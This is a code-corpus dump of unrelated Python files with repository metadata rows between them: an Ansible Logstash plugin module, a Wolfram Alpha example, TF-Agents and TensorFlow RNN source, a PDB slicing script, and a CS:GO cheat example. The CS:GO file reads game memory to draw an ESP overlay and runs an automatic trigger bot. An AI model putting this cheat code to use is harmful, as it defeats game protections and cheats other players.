def is_plugin_present(module, plugin_bin, plugin_name):
cmd_args = [plugin_bin, "list", plugin_name]
rc, out, err = module.run_command(" ".join(cmd_args))
return rc == 0
def parse_error(string):
reason = "reason: "
try:
return string[string.index(reason) + len(reason):].strip()
except ValueError:
return string
def install_plugin(module, plugin_bin, plugin_name, version, proxy_host, proxy_port):
cmd_args = [plugin_bin, PACKAGE_STATE_MAP["present"], plugin_name]
if version:
cmd_args.append("--version %s" % version)
if proxy_host and proxy_port:
cmd_args.append("-DproxyHost=%s -DproxyPort=%s" % (proxy_host, proxy_port))
cmd = " ".join(cmd_args)
if module.check_mode:
rc, out, err = 0, "check mode", ""
else:
rc, out, err = module.run_command(cmd)
if rc != 0:
reason = parse_error(out)
module.fail_json(msg=reason)
return True, cmd, out, err
def remove_plugin(module, plugin_bin, plugin_name):
cmd_args = [plugin_bin, PACKAGE_STATE_MAP["absent"], plugin_name]
cmd = " ".join(cmd_args)
if module.check_mode:
rc, out, err = 0, "check mode", ""
else:
rc, out, err = module.run_command(cmd)
if rc != 0:
reason = parse_error(out)
module.fail_json(msg=reason)
return True, cmd, out, err
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(required=True),
state=dict(default="present", choices=PACKAGE_STATE_MAP.keys()),
plugin_bin=dict(default="/usr/share/logstash/bin/logstash-plugin", type="path"),
proxy_host=dict(default=None),
proxy_port=dict(default=None),
version=dict(default=None)
),
supports_check_mode=True
)
name = module.params["name"]
state = module.params["state"]
plugin_bin = module.params["plugin_bin"]
proxy_host = module.params["proxy_host"]
proxy_port = module.params["proxy_port"]
version = module.params["version"]
present = is_plugin_present(module, plugin_bin, name)
# skip if the state is correct
if (present and state == "present") or (state == "absent" and not present):
module.exit_json(changed=False, name=name, state=state)
if state == "present":
changed, cmd, out, err = install_plugin(module, plugin_bin, name, version, proxy_host, proxy_port)
elif state == "absent":
changed, cmd, out, err = remove_plugin(module, plugin_bin, name)
module.exit_json(changed=changed, cmd=cmd, name=name, state=state, stdout=out, stderr=err)
if __name__ == '__main__':
main()
| 28.538043
| 106
| 0.655113
|
3c0b2874c8ec9c138eb2bfa36d6845104f7a73f1
| 5,730
|
py
|
Python
|
examples/csgo_esp.py
|
zenxs/PyMeow
|
a7596cb3057225761d2be9aaff69000894b822a0
|
[
"MIT"
] | 2
|
2021-09-01T11:39:52.000Z
|
2022-01-02T13:35:54.000Z
|
examples/csgo_esp.py
|
zenxs/PyMeow
|
a7596cb3057225761d2be9aaff69000894b822a0
|
[
"MIT"
] | null | null | null |
examples/csgo_esp.py
|
zenxs/PyMeow
|
a7596cb3057225761d2be9aaff69000894b822a0
|
[
"MIT"
] | null | null | null |
import sys
from pymeow import *
from requests import get
class Offsets:
pass
class Colors:
white = rgb("white")
black = rgb("black")
blue = rgb("blue")
red = rgb("red")
cyan = rgb("cyan")
orange = rgb("orange")
silver = rgb("silver")
class Entity:
def __init__(self, addr, mem, gmod):
self.wts = None
self.addr = addr
self.mem = mem
self.gmod = gmod
self.id = read_int(self.mem, self.addr + 0x64)
self.health = read_int(self.mem, self.addr + Offsets.m_iHealth)
self.dormant = read_int(self.mem, self.addr + Offsets.m_bDormant)
self.team = read_int(self.mem, self.addr + Offsets.m_iTeamNum)
self.bone_base = read_int(self.mem, self.addr + Offsets.m_dwBoneMatrix)
self.pos = read_vec3(self.mem, self.addr + Offsets.m_vecOrigin)
@property
def name(self):
radar_base = read_int(self.mem, self.gmod + Offsets.dwRadarBase)
hud_radar = read_int(self.mem, radar_base + 0x78)
return read_string(self.mem, hud_radar + 0x300 + (0x174 * (self.id - 1)))
def bone_pos(self, bone_id):
return vec3(
read_float(self.mem, self.bone_base + 0x30 * bone_id + 0x0C),
read_float(self.mem, self.bone_base + 0x30 * bone_id + 0x1C),
read_float(self.mem, self.bone_base + 0x30 * bone_id + 0x2C),
)
def glow(self):
"""
Should be used in a thread.
"""
glow_addr = (
read_int(self.mem, self.gmod + Offsets.dwGlowObjectManager)
+ read_int(self.mem, self.addr + Offsets.m_iGlowIndex) * 0x38
)
color = Colors.cyan if self.team != 2 else Colors.orange
write_floats(self.mem, glow_addr + 4, color + [1.5])
write_bytes(self.mem, glow_addr + 0x24, [1, 0])
def trigger_bot(mem, local, ent):
cross = read_int(mem, local.addr + Offsets.m_iCrosshairId)
if cross == ent.id and ent.team != local.team:
mouse_click()
def main():
try:
# Credits to https://github.com/frk1/hazedumper
haze = get("https://raw.githubusercontent.com/frk1/hazedumper/master/csgo.json").json()
[setattr(Offsets, k, v) for k, v in haze["signatures"].items()]
[setattr(Offsets, k, v) for k, v in haze["netvars"].items()]
except:
sys.exit("Unable to fetch Hazedumper's Offsets")
csgo_proc = process_by_name("csgo.exe")
game_module = csgo_proc["modules"]["client.dll"]["baseaddr"]
overlay = overlay_init() # Windowed Fullscreen
font = font_init(10, "Tahoma")
set_foreground("Counter-Strike: Global Offensive")
while overlay_loop(overlay):
try:
local_player_addr = read_int(csgo_proc, game_module + Offsets.dwLocalPlayer)
local_ent = Entity(local_player_addr, csgo_proc, game_module)
except:
# No local player
continue
if local_player_addr:
ent_addrs = read_ints(csgo_proc, game_module + Offsets.dwEntityList, 128)[0::4]
view_matrix = read_floats(csgo_proc, game_module + Offsets.dwViewMatrix, 16)
for ent_addr in ent_addrs:
if ent_addr > 0 and ent_addr != local_player_addr:
ent = Entity(ent_addr, csgo_proc, game_module)
if not ent.dormant and ent.health > 0:
try:
ent.wts = wts_dx(overlay, view_matrix, ent.pos)
# ent.glow()
head_pos = wts_dx(overlay, view_matrix, ent.bone_pos(8))
head = head_pos["y"] - ent.wts["y"]
width = head / 2
center = width / -2
corner_box(
ent.wts["x"] + center,
ent.wts["y"],
width,
head + 5,
Colors.cyan if ent.team != 2 else Colors.red,
Colors.black,
0.15,
)
value_bar(
ent.wts["x"] + center - 5,
ent.wts["y"],
ent.wts["x"] + center - 5,
head_pos["y"] + 5,
2,
100, ent.health
)
font_print(
font,
ent.wts["x"] - len(ent.name) * 1.5,
ent.wts["y"] - 10,
ent.name,
Colors.white,
)
font_print(
font,
ent.wts["x"] - 2,
ent.wts["y"] - 20,
str(int(vec3_distance(ent.pos, local_ent.pos) / 20)),
Colors.white,
)
dashed_line(
overlay["midX"],
overlay["midY"],
ent.wts["x"],
ent.wts["y"],
1,
Colors.silver,
)
trigger_bot(csgo_proc, local_ent, ent)
except:
pass
overlay_deinit(overlay)
if __name__ == "__main__":
main()
| 37.207792
| 95
| 0.460908
|
35e47f6bd27c29eb96181326b9c40866dc06a3f4
| 743
|
py
|
Python
|
py_wolfram/wapex3.py
|
JMaio/Askii
|
7cc611b470226a7983f85b4788df5884fa5140ed
|
[
"Apache-2.0"
] | null | null | null |
py_wolfram/wapex3.py
|
JMaio/Askii
|
7cc611b470226a7983f85b4788df5884fa5140ed
|
[
"Apache-2.0"
] | null | null | null |
py_wolfram/wapex3.py
|
JMaio/Askii
|
7cc611b470226a7983f85b4788df5884fa5140ed
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import wap
server = 'http://api.wolframalpha.com/v2/query.jsp'
appid = 'XXXX'
input = 'pi'
waeo = wap.WolframAlphaEngine(appid, server)
queryStr = waeo.CreateQuery(input)
wap.WolframAlphaQuery(queryStr, appid)
result = waeo.PerformQuery(queryStr)
result = wap.WolframAlphaQueryResult(result)
for pod in result.Pods():
waPod = wap.Pod(pod)
title = "Pod.title: " + waPod.Title()[0]
print title
for subpod in waPod.Subpods():
waSubpod = wap.Subpod(subpod)
plaintext = waSubpod.Plaintext()[0]
img = waSubpod.Img()
src = wap.scanbranches(img[0], 'src')[0]
alt = wap.scanbranches(img[0], 'alt')[0]
print "-------------"
print "img.src: " + src
print "img.alt: " + alt
print "\n"
| 25.62069
| 51
| 0.66891
|
5a354848db3ce6db64424fb17d8f5bf471d55494
| 4,802
|
py
|
Python
|
tf_agents/policies/fixed_policy.py
|
Francis777/agents
|
24e878a697be418307cfbff69724d86be767719d
|
[
"Apache-2.0"
] | null | null | null |
tf_agents/policies/fixed_policy.py
|
Francis777/agents
|
24e878a697be418307cfbff69724d86be767719d
|
[
"Apache-2.0"
] | null | null | null |
tf_agents/policies/fixed_policy.py
|
Francis777/agents
|
24e878a697be418307cfbff69724d86be767719d
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A policy which always returns a fixed action.
Mainly used for unit tests.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from typing import Optional, Text
import tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import
import tensorflow_probability as tfp
from tf_agents.policies import tf_policy
from tf_agents.trajectories import policy_step
from tf_agents.trajectories import time_step as ts
from tf_agents.typing import types
from tf_agents.utils import common
from tf_agents.utils import nest_utils
class FixedPolicy(tf_policy.TFPolicy):
"""A policy which always returns a fixed action."""
def __init__(self,
actions: types.NestedTensor,
time_step_spec: ts.TimeStep,
action_spec: types.NestedTensorSpec,
emit_log_probability: bool = True,
policy_info: types.NestedTensorSpec = (),
info_spec: types.NestedTensorSpec = (),
name: Optional[Text] = None):
"""A policy which always returns a fixed action.
Args:
actions: A Tensor, or a nested dict, list or tuple of Tensors
corresponding to `action_spec()`.
time_step_spec: A `TimeStep` spec of the expected time_steps.
action_spec: A nest of BoundedTensorSpec representing the actions.
emit_log_probability: Emit log-probabilities of actions, if supported. If
True, policy_step.info will have CommonFields.LOG_PROBABILITY set.
Please consult utility methods provided in policy_step for setting and
retrieving these. When working with custom policies, either provide a
dictionary info_spec or a namedtuple with the field 'log_probability'.
policy_info: A policy info to be returned in PolicyStep.
info_spec: A policy info spec.
name: The name of this policy. All variables in this module will fall
under that name. Defaults to the class name.
"""
super(FixedPolicy, self).__init__(time_step_spec, action_spec, clip=False,
info_spec=info_spec,
name=name,
emit_log_probability=emit_log_probability)
nest_utils.assert_same_structure(self._action_spec, actions)
def convert(action, spec):
return tf.convert_to_tensor(value=action, dtype=spec.dtype)
self._action_value = tf.nest.map_structure(convert, actions,
self._action_spec)
if self._emit_log_probability:
log_probability = tf.nest.map_structure(
lambda t: tf.constant(0.0, tf.float32), self._action_spec)
self._policy_info = policy_step.set_log_probability(policy_info,
log_probability) # pytype: disable=wrong-arg-types
else:
self._policy_info = policy_info
def _variables(self):
return []
def _get_policy_info_and_action(self, time_step):
outer_shape = nest_utils.get_outer_shape(time_step, self._time_step_spec)
if self._emit_log_probability:
log_probability = tf.nest.map_structure(
lambda _: tf.zeros(outer_shape, tf.float32), self._action_spec)
policy_info = policy_step.set_log_probability(
self._policy_info, log_probability=log_probability)
else:
policy_info = self._policy_info
action = tf.nest.map_structure(lambda t: common.replicate(t, outer_shape),
self._action_value)
return policy_info, action
def _action(self, time_step, policy_state, seed):
del seed
policy_info, action = self._get_policy_info_and_action(time_step)
return policy_step.PolicyStep(action, policy_state, policy_info)
def _distribution(self, time_step, policy_state):
policy_info, action = self._get_policy_info_and_action(time_step)
def dist_fn(action):
"""Return a categorical distribution with all density on fixed action."""
return tfp.distributions.Deterministic(loc=action)
return policy_step.PolicyStep(
tf.nest.map_structure(dist_fn, action), policy_state, policy_info)
| 42.122807
| 109
| 0.702832
|
bdab127d3bdba5e9517e41922671458fb53d8ee0
| 4,224
|
py
|
Python
|
pdb_rslice.py
|
edraizen/pdb-tools
|
b43ef472cb9c53ef58e400888a2ed837512ae7ee
|
[
"Apache-2.0"
] | null | null | null |
pdb_rslice.py
|
edraizen/pdb-tools
|
b43ef472cb9c53ef58e400888a2ed837512ae7ee
|
[
"Apache-2.0"
] | null | null | null |
pdb_rslice.py
|
edraizen/pdb-tools
|
b43ef472cb9c53ef58e400888a2ed837512ae7ee
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""
Extracts a portion of the PDB file, from residue i (to residue j).
Slices are inclusive.
usage: python pdb_rslice.py <i>:<j> <pdb file>
examples: python pdb_rslice.py 1:10 1CTF.pdb # Extracts residues 1 to 10
python pdb_rslice.py 1: 1CTF.pdb # Extracts residues 1 to END
python pdb_rslice.py :5 1CTF.pdb # Extracts residues from START to 5.
python pdb_rslice.py :5 10: 1CTF.pdb # Extracts residues from START to 5 10 to END
Author: {0} ({1})
This program is part of the PDB tools distributed with HADDOCK
or with the HADDOCK tutorial. The utilities in this package
can be used to quickly manipulate PDB files, with the benefit
of 'piping' several different commands. This is a rewrite of old
FORTRAN77 code that was taking too much effort to compile. RIP.
"""
import os
import re
import sys
from collections import defaultdict
__author__ = "Joao Rodrigues"
__email__ = "j.p.g.l.m.rodrigues@gmail.com"
USAGE = __doc__.format(__author__, __email__)
#SEQUENTIAL = False
def check_input(args):
"""
Checks whether to read from stdin/file and validates user input/options.
"""
if not len(args):
sys.stderr.write(USAGE)
sys.exit(1)
elif len(args) >= 1:
if not sys.stdin.isatty() and not os.path.isfile(args[-1]):
# Options & Pipe
pdbfh = sys.stdin
end = len(args)
elif os.path.isfile(args[-1]):
# Options & File
pdbfh = open(args[-1], 'r')
end = -1
else:
sys.stderr.write('File not found: ' + args[-1] + '\n')
sys.stderr.write(USAGE)
sys.exit(1)
rslice = args[:end]
else:
sys.stderr.write(USAGE)
sys.exit(1)
# Parse st and end of slices
_rslices = []
for _rslice in rslice:
match = re.match('([\-0-9A-Z]*):([\-0-9A-Z]*)', _rslice)
if match:
st_slice, en_slice = match.groups()
if st_slice == "":
st_slice = True
if en_slice == "":
en_slice = True
else:
match = re.match('([\-0-9A-Z]*)', _rslice)
if match:
st_slice = match.group()
en_slice = None
else:
sys.stderr.write('Invalid slice: ' + _rslice + '\n')
sys.stderr.write(USAGE)
sys.exit(1)
_rslices.append((st_slice, en_slice))
return (_rslices, pdbfh)
def _slice_pdb(fhandle, rslice):
"""Enclosing logic in a function to speed up a bit"""
# if False: #and not SEQUENTIAL:
# for line in fhandle:
# if line.startswith(('ATOM', 'HETATM', 'TER')):
# if any((st <= int(line[22:26]) <= en for st, en in rslice)):
# yield line
# else:
# yield line
# else:
#set rslice status, True=open/reading residues until end is found
status = [False]*len(rslice)
#Set begining open rslices
for i, (st, en) in enumerate(rslice):
if isinstance(st, bool) and st:
status[i] == True
for line in fhandle:
if line.startswith(('ATOM', 'HETATM', 'TER')):
res = line[22:27].strip()
for i, (st, en) in enumerate(rslice):
if res == st:
status[i] = True
break
elif res == en:
status[i] = False
break
elif en is None:
status[i] = False
for i in range(len(rslice)):
if status[i]:
yield line
break
if __name__ == '__main__':
# Check Input
rslice, pdbfh = check_input(sys.argv[1:])
# Do the job
new_pdb = _slice_pdb(pdbfh, rslice)
try:
sys.stdout.write(''.join(new_pdb))
#sys.stdout.flush()
pass
except IOError:
# This is here to catch Broken Pipes
# for example to use 'head' or 'tail' without
# the error message showing up
pass
# last line of the script
# We can close it even if it is sys.stdin
pdbfh.close()
sys.exit(0)
| 29.333333
| 93
| 0.547112
|
500e3b78597c6bda22c23770a2a96b1bd30f4a4e
| 39,893
|
py
|
Python
|
tensorflow/python/ops/rnn_cell_impl.py
|
salonirk11/tensorflow
|
7fda1bb1177c69fa7bf80d20d5c5e7aaa25816e7
|
[
"Apache-2.0"
] | 13
|
2017-02-22T02:20:06.000Z
|
2018-06-06T04:18:03.000Z
|
tensorflow/python/ops/rnn_cell_impl.py
|
salonirk11/tensorflow
|
7fda1bb1177c69fa7bf80d20d5c5e7aaa25816e7
|
[
"Apache-2.0"
] | 10
|
2017-07-13T00:24:03.000Z
|
2017-07-17T07:39:03.000Z
|
tensorflow/python/ops/rnn_cell_impl.py
|
salonirk11/tensorflow
|
7fda1bb1177c69fa7bf80d20d5c5e7aaa25816e7
|
[
"Apache-2.0"
] | 7
|
2017-08-01T04:02:07.000Z
|
2018-10-06T21:07:20.000Z
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module implementing RNN Cells.
This module provides a number of basic commonly used RNN cells, such as LSTM
(Long Short Term Memory) or GRU (Gated Recurrent Unit), and a number of
operators that allow adding dropouts, projections, or embeddings for inputs.
Constructing multi-layer cells is supported by the class `MultiRNNCell`, or by
calling the `rnn` ops several times.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import hashlib
import numbers
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.layers import base as base_layer
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import partitioned_variables
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.ops import variables as tf_variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import nest
_BIAS_VARIABLE_NAME = "bias"
_WEIGHTS_VARIABLE_NAME = "kernel"
def _like_rnncell(cell):
"""Checks that a given object is an RNNCell by using duck typing."""
conditions = [hasattr(cell, "output_size"), hasattr(cell, "state_size"),
hasattr(cell, "zero_state"), callable(cell)]
return all(conditions)
def _concat(prefix, suffix, static=False):
"""Concat that enables int, Tensor, or TensorShape values.
This function takes a size specification, which can be an integer, a
TensorShape, or a Tensor, and converts it into a concatenated Tensor
(if static = False) or a list of integers (if static = True).
Args:
prefix: The prefix; usually the batch size (and/or time step size).
(TensorShape, int, or Tensor.)
suffix: TensorShape, int, or Tensor.
static: If `True`, return a python list with possibly unknown dimensions.
Otherwise return a `Tensor`.
Returns:
shape: the concatenation of prefix and suffix.
Raises:
ValueError: if `suffix` is not a scalar or vector (or TensorShape).
ValueError: if prefix or suffix was `None` and asked for dynamic
Tensors out.
"""
if isinstance(prefix, ops.Tensor):
p = prefix
p_static = tensor_util.constant_value(prefix)
if p.shape.ndims == 0:
p = array_ops.expand_dims(p, 0)
elif p.shape.ndims != 1:
raise ValueError("prefix tensor must be either a scalar or vector, "
"but saw tensor: %s" % p)
else:
p = tensor_shape.as_shape(prefix)
p_static = p.as_list() if p.ndims is not None else None
p = (constant_op.constant(p.as_list(), dtype=dtypes.int32)
if p.is_fully_defined() else None)
if isinstance(suffix, ops.Tensor):
s = suffix
s_static = tensor_util.constant_value(suffix)
if s.shape.ndims == 0:
s = array_ops.expand_dims(s, 0)
elif s.shape.ndims != 1:
raise ValueError("suffix tensor must be either a scalar or vector, "
"but saw tensor: %s" % s)
else:
s = tensor_shape.as_shape(suffix)
s_static = s.as_list() if s.ndims is not None else None
s = (constant_op.constant(s.as_list(), dtype=dtypes.int32)
if s.is_fully_defined() else None)
if static:
shape = tensor_shape.as_shape(p_static).concatenate(s_static)
shape = shape.as_list() if shape.ndims is not None else None
else:
if p is None or s is None:
raise ValueError("Provided a prefix or suffix of None: %s and %s"
% (prefix, suffix))
shape = array_ops.concat((p, s), 0)
return shape
def _zero_state_tensors(state_size, batch_size, dtype):
"""Create tensors of zeros based on state_size, batch_size, and dtype."""
def get_state_shape(s):
"""Combine s with batch_size to get a proper tensor shape."""
c = _concat(batch_size, s)
c_static = _concat(batch_size, s, static=True)
size = array_ops.zeros(c, dtype=dtype)
size.set_shape(c_static)
return size
return nest.map_structure(get_state_shape, state_size)
class RNNCell(base_layer.Layer):
"""Abstract object representing an RNN cell.
Every `RNNCell` must have the properties below and implement `call` with
the signature `(output, next_state) = call(input, state)`. The optional
third input argument, `scope`, is allowed for backwards compatibility
purposes; but should be left off for new subclasses.
This definition of cell differs from the definition used in the literature.
In the literature, 'cell' refers to an object with a single scalar output.
This definition refers to a horizontal array of such units.
An RNN cell, in the most abstract setting, is anything that has
a state and performs some operation that takes a matrix of inputs.
This operation results in an output matrix with `self.output_size` columns.
If `self.state_size` is an integer, this operation also results in a new
state matrix with `self.state_size` columns. If `self.state_size` is a
(possibly nested tuple of) TensorShape object(s), then it should return a
matching structure of Tensors having shape `[batch_size].concatenate(s)`
for each `s` in `self.batch_size`.
"""
def __call__(self, inputs, state, scope=None):
"""Run this RNN cell on inputs, starting from the given state.
Args:
inputs: `2-D` tensor with shape `[batch_size x input_size]`.
state: if `self.state_size` is an integer, this should be a `2-D Tensor`
with shape `[batch_size x self.state_size]`. Otherwise, if
`self.state_size` is a tuple of integers, this should be a tuple
with shapes `[batch_size x s] for s in self.state_size`.
scope: VariableScope for the created subgraph; defaults to class name.
Returns:
A pair containing:
- Output: A `2-D` tensor with shape `[batch_size x self.output_size]`.
- New state: Either a single `2-D` tensor, or a tuple of tensors matching
the arity and shapes of `state`.
"""
if scope is not None:
with vs.variable_scope(scope,
custom_getter=self._rnn_get_variable) as scope:
return super(RNNCell, self).__call__(inputs, state, scope=scope)
else:
with vs.variable_scope(vs.get_variable_scope(),
custom_getter=self._rnn_get_variable):
return super(RNNCell, self).__call__(inputs, state)
def _rnn_get_variable(self, getter, *args, **kwargs):
variable = getter(*args, **kwargs)
trainable = (variable in tf_variables.trainable_variables() or
(isinstance(variable, tf_variables.PartitionedVariable) and
list(variable)[0] in tf_variables.trainable_variables()))
if trainable and variable not in self._trainable_weights:
self._trainable_weights.append(variable)
elif not trainable and variable not in self._non_trainable_weights:
self._non_trainable_weights.append(variable)
return variable
@property
def state_size(self):
"""size(s) of state(s) used by this cell.
It can be represented by an Integer, a TensorShape or a tuple of Integers
or TensorShapes.
"""
raise NotImplementedError("Abstract method")
@property
def output_size(self):
"""Integer or TensorShape: size of outputs produced by this cell."""
raise NotImplementedError("Abstract method")
def build(self, _):
# This tells the parent Layer object that it's OK to call
# self.add_variable() inside the call() method.
pass
def zero_state(self, batch_size, dtype):
"""Return zero-filled state tensor(s).
Args:
batch_size: int, float, or unit Tensor representing the batch size.
dtype: the data type to use for the state.
Returns:
If `state_size` is an int or TensorShape, then the return value is a
`N-D` tensor of shape `[batch_size x state_size]` filled with zeros.
If `state_size` is a nested list or tuple, then the return value is
a nested list or tuple (of the same structure) of `2-D` tensors with
the shapes `[batch_size x s]` for each s in `state_size`.
"""
with ops.name_scope(type(self).__name__ + "ZeroState", values=[batch_size]):
state_size = self.state_size
return _zero_state_tensors(state_size, batch_size, dtype)
class BasicRNNCell(RNNCell):
"""The most basic RNN cell.
Args:
num_units: int, The number of units in the LSTM cell.
activation: Nonlinearity to use. Default: `tanh`.
reuse: (optional) Python boolean describing whether to reuse variables
in an existing scope. If not `True`, and the existing scope already has
the given variables, an error is raised.
"""
def __init__(self, num_units, activation=None, reuse=None):
super(BasicRNNCell, self).__init__(_reuse=reuse)
self._num_units = num_units
self._activation = activation or math_ops.tanh
@property
def state_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
def call(self, inputs, state):
"""Most basic RNN: output = new_state = act(W * input + U * state + B)."""
output = self._activation(_linear([inputs, state], self._num_units, True))
return output, output
class GRUCell(RNNCell):
"""Gated Recurrent Unit cell (cf. http://arxiv.org/abs/1406.1078)."""
def __init__(self,
num_units,
activation=None,
reuse=None,
kernel_initializer=None,
bias_initializer=None):
super(GRUCell, self).__init__(_reuse=reuse)
self._num_units = num_units
self._activation = activation or math_ops.tanh
self._kernel_initializer = kernel_initializer
self._bias_initializer = bias_initializer
@property
def state_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
def call(self, inputs, state):
"""Gated recurrent unit (GRU) with nunits cells."""
with vs.variable_scope("gates"): # Reset gate and update gate.
# We start with bias of 1.0 to not reset and not update.
bias_ones = self._bias_initializer
if self._bias_initializer is None:
dtype = [a.dtype for a in [inputs, state]][0]
bias_ones = init_ops.constant_initializer(1.0, dtype=dtype)
value = math_ops.sigmoid(
_linear([inputs, state], 2 * self._num_units, True, bias_ones,
self._kernel_initializer))
r, u = array_ops.split(value=value, num_or_size_splits=2, axis=1)
with vs.variable_scope("candidate"):
c = self._activation(
_linear([inputs, r * state], self._num_units, True,
self._bias_initializer, self._kernel_initializer))
new_h = u * state + (1 - u) * c
return new_h, new_h
_LSTMStateTuple = collections.namedtuple("LSTMStateTuple", ("c", "h"))
class LSTMStateTuple(_LSTMStateTuple):
"""Tuple used by LSTM Cells for `state_size`, `zero_state`, and output state.
Stores two elements: `(c, h)`, in that order.
Only used when `state_is_tuple=True`.
"""
__slots__ = ()
@property
def dtype(self):
(c, h) = self
if c.dtype != h.dtype:
raise TypeError("Inconsistent internal state: %s vs %s" %
(str(c.dtype), str(h.dtype)))
return c.dtype
class BasicLSTMCell(RNNCell):
"""Basic LSTM recurrent network cell.
The implementation is based on: http://arxiv.org/abs/1409.2329.
We add forget_bias (default: 1) to the biases of the forget gate in order to
reduce the scale of forgetting in the beginning of the training.
It does not allow cell clipping, a projection layer, and does not
use peep-hole connections: it is the basic baseline.
For advanced models, please use the full @{tf.nn.rnn_cell.LSTMCell}
that follows.
"""
def __init__(self, num_units, forget_bias=1.0,
state_is_tuple=True, activation=None, reuse=None):
"""Initialize the basic LSTM cell.
Args:
num_units: int, The number of units in the LSTM cell.
forget_bias: float, The bias added to forget gates (see above).
state_is_tuple: If True, accepted and returned states are 2-tuples of
the `c_state` and `m_state`. If False, they are concatenated
along the column axis. The latter behavior will soon be deprecated.
activation: Activation function of the inner states. Default: `tanh`.
reuse: (optional) Python boolean describing whether to reuse variables
in an existing scope. If not `True`, and the existing scope already has
the given variables, an error is raised.
"""
super(BasicLSTMCell, self).__init__(_reuse=reuse)
if not state_is_tuple:
logging.warn("%s: Using a concatenated state is slower and will soon be "
"deprecated. Use state_is_tuple=True.", self)
self._num_units = num_units
self._forget_bias = forget_bias
self._state_is_tuple = state_is_tuple
self._activation = activation or math_ops.tanh
@property
def state_size(self):
return (LSTMStateTuple(self._num_units, self._num_units)
if self._state_is_tuple else 2 * self._num_units)
@property
def output_size(self):
return self._num_units
def call(self, inputs, state):
"""Long short-term memory cell (LSTM)."""
sigmoid = math_ops.sigmoid
# Parameters of gates are concatenated into one multiply for efficiency.
if self._state_is_tuple:
c, h = state
else:
c, h = array_ops.split(value=state, num_or_size_splits=2, axis=1)
concat = _linear([inputs, h], 4 * self._num_units, True)
# i = input_gate, j = new_input, f = forget_gate, o = output_gate
i, j, f, o = array_ops.split(value=concat, num_or_size_splits=4, axis=1)
new_c = (
c * sigmoid(f + self._forget_bias) + sigmoid(i) * self._activation(j))
new_h = self._activation(new_c) * sigmoid(o)
if self._state_is_tuple:
new_state = LSTMStateTuple(new_c, new_h)
else:
new_state = array_ops.concat([new_c, new_h], 1)
return new_h, new_state
class LSTMCell(RNNCell):
"""Long short-term memory unit (LSTM) recurrent network cell.
The default non-peephole implementation is based on:
http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf
S. Hochreiter and J. Schmidhuber.
"Long Short-Term Memory". Neural Computation, 9(8):1735-1780, 1997.
The peephole implementation is based on:
https://research.google.com/pubs/archive/43905.pdf
Hasim Sak, Andrew Senior, and Francoise Beaufays.
"Long short-term memory recurrent neural network architectures for
large scale acoustic modeling." INTERSPEECH, 2014.
The class uses optional peep-hole connections, optional cell clipping, and
an optional projection layer.
"""
def __init__(self, num_units,
use_peepholes=False, cell_clip=None,
initializer=None, num_proj=None, proj_clip=None,
num_unit_shards=None, num_proj_shards=None,
forget_bias=1.0, state_is_tuple=True,
activation=None, reuse=None):
"""Initialize the parameters for an LSTM cell.
Args:
num_units: int, The number of units in the LSTM cell
use_peepholes: bool, set True to enable diagonal/peephole connections.
cell_clip: (optional) A float value, if provided the cell state is clipped
by this value prior to the cell output activation.
initializer: (optional) The initializer to use for the weight and
projection matrices.
num_proj: (optional) int, The output dimensionality for the projection
matrices. If None, no projection is performed.
proj_clip: (optional) A float value. If `num_proj > 0` and `proj_clip` is
provided, then the projected values are clipped elementwise to within
`[-proj_clip, proj_clip]`.
num_unit_shards: Deprecated, will be removed by Jan. 2017.
Use a variable_scope partitioner instead.
num_proj_shards: Deprecated, will be removed by Jan. 2017.
Use a variable_scope partitioner instead.
forget_bias: Biases of the forget gate are initialized by default to 1
in order to reduce the scale of forgetting at the beginning of
the training.
state_is_tuple: If True, accepted and returned states are 2-tuples of
the `c_state` and `m_state`. If False, they are concatenated
along the column axis. This latter behavior will soon be deprecated.
activation: Activation function of the inner states. Default: `tanh`.
reuse: (optional) Python boolean describing whether to reuse variables
in an existing scope. If not `True`, and the existing scope already has
the given variables, an error is raised.
"""
super(LSTMCell, self).__init__(_reuse=reuse)
if not state_is_tuple:
logging.warn("%s: Using a concatenated state is slower and will soon be "
"deprecated. Use state_is_tuple=True.", self)
if num_unit_shards is not None or num_proj_shards is not None:
logging.warn(
"%s: The num_unit_shards and proj_unit_shards parameters are "
"deprecated and will be removed in Jan 2017. "
"Use a variable scope with a partitioner instead.", self)
self._num_units = num_units
self._use_peepholes = use_peepholes
self._cell_clip = cell_clip
self._initializer = initializer
self._num_proj = num_proj
self._proj_clip = proj_clip
self._num_unit_shards = num_unit_shards
self._num_proj_shards = num_proj_shards
self._forget_bias = forget_bias
self._state_is_tuple = state_is_tuple
self._activation = activation or math_ops.tanh
if num_proj:
self._state_size = (
